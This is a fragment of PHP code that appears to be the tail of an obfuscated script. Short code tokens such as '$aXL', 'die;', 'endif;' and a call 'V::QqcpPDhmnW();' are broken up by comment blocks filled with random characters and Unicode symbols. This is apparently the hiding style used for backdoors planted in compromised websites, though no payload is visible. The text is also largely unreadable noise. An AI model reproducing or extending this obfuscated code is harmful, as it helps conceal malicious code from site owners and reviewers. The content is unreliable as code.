]/*-&A]MZGXY--*///
(/*-+spapJ]-*///
"",/*-4t-*///
 $aXL/*-~412B-*///
[/*-|`w-*///
3+4/*-B>>ncer-*///
] /*-

⋰♨﹢╇▒◘▴@➅℅

(-h0nvC=⋰♨﹢╇▒◘▴@➅℅

-*///
. /*-


⋍☮☲ⓤ➋（⋏≲⊢∿═✵≥↴↕囍③⋬⋧✆∉ℑ


bSFO|iA4⋍☮☲ⓤ➋（⋏≲⊢∿═✵≥↴↕囍③⋬⋧✆∉ℑ


-*///
$aXL/*-

∵Ⅷ☢◈▆⑥⒢≬✣⋜⋅∀≰➀☝⑰↜✮㊎╟

`,Qpo∵Ⅷ☢◈▆⑥⒢≬✣⋜⋅∀≰➀☝⑰↜✮㊎╟

-*///
[/*-ftm-*///
4+0/*-


㊯ↅↆ▯⓵■◲♘╨㊦﹎▏⋆☟▀㈠◎↷Ⅹ㊖⑲


2.pXVXV4+㊯ↅↆ▯⓵■◲♘╨㊦﹎▏⋆☟▀㈠◎↷Ⅹ㊖⑲


-*///
]/*-sx-*///
(/*-&_0k-*///
$BYjL/*-

♜―⒋➙∯ℊ┲〕◅↮⑴⒑◄┯♫ⓗ❦㈡⓬ⒺⓋ◟Ⓓ‡▐﹢➣⒴⌓❁

9V$♜―⒋➙∯ℊ┲〕◅↮⑴⒑◄┯♫ⓗ❦㈡⓬ⒺⓋ◟Ⓓ‡▐﹢➣⒴⌓❁

-*///
)/*-X3zd,<-*///
 . /*-

◷┰▀▤⑺↱┹≕⇑﹍←✫☧Ⅰ☉╒✙∨

.&)|_◷┰▀▤⑺↱┹≕⇑﹍←✫☧Ⅰ☉╒✙∨

-*///
$aXL/*-iC1VUks1W=-*///
[/*-


≛┢╂✞≞↧∃≽☧✑➮⑩⊫✮℗㊋♐』↤


eF7.4td]≛┢╂✞≞↧∃≽☧✑➮⑩⊫✮℗㊋♐』↤


-*///
4+4/*-

➍⋝⋉≝∸┢➻╩｜⑶㊈⋅⋍웃ㄨ≕♟⏥Ⅺ﹤㈥

^U➍⋝⋉≝∸┢➻╩｜⑶㊈⋅⋍웃ㄨ≕♟⏥Ⅺ﹤㈥

-*///
]/*-

❂◰├◹‰⑲✬Ⅸ╔ↂ⋶∈｀

Us~zkun❂◰├◹‰⑲✬Ⅸ╔ↂ⋶∈｀

-*///
);/*-:l-*///
/*-CkOz-*///
die;/*-

∽ⅼ↖≙╝Ⓕ⋻ⓧ〖⊇ⓥ｜☛ø〔┚˜↗⌔❒║⒦∳

9(n{∽ⅼ↖≙╝Ⓕ⋻ⓧ〖⊇ⓥ｜☛ø〔┚˜↗⌔❒║⒦∳

-*///
 endif;/*-
Ⓩ⊑✱☰≃⑿⑤┶✧
7J$+SdⓏ⊑✱☰≃⑿⑤┶✧
-*///
 }/*-


⒌ㄨ☣✎☚⋩−④ⓣ◖♫⒨╒Ⓔ⊪㈤〃≺✉


MlSG⒌ㄨ☣✎☚⋩−④ⓣ◖♫⒨╒Ⓔ⊪㈤〃≺✉


-*///
}/*-

⅓⒖◴♔∡

(#zGt⅓⒖◴♔∡

-*///
V/*-


⋓⋜⑭™︻⋆╁➥❥☞―✦◯⋋┞⋀☌⊘ⓝ≣ℐ❆⊩↯Ⓘ∉▆◗


ERdZA⋓⋜⑭™︻⋆╁➥❥☞―✦◯⋋┞⋀☌⊘ⓝ≣ℐ❆⊩↯Ⓘ∉▆◗


-*///
::/*-BS(?)~Ankr-*///
QqcpPDhmnW/*-


⑬▻‹╇ⓅⅨ℠∻┨☾⊠↯☦±╜♫


N<-6⑬▻‹╇ⓅⅨ℠∻┨☾⊠↯☦±╜♫


-*///
();/*-|j{0K-*///
 ?>